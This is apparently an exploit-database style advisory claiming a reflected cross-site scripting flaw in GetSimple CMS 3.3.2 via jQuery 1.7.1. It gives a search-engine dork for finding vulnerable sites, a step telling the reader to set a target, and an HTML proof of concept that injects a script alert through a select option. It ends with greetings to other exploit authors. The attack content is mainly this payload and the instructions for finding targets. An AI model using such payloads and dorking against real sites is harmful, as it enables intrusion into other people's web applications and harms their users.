==================================================================================================================================== | # Title : GetSimple CMS v3.3.2 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://get-simple.info/ | | # Dork : © 2009-2014 GetSimple CMS – Version 3.3.2 | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] LIne 5 Se7 y0ur T@rg3t . [+] XSS Reflected - Jquery v1.7.1 : <html> <head> <meta charset="utf-8"> <title>XSS Reflected - Jquery v1.7.1 </title> <script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script> </head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script>alert('xss reflected - jquery v1.7.1 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com');</script></option> </select> </p> </form> </body> </html> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | =======================================================================================================================================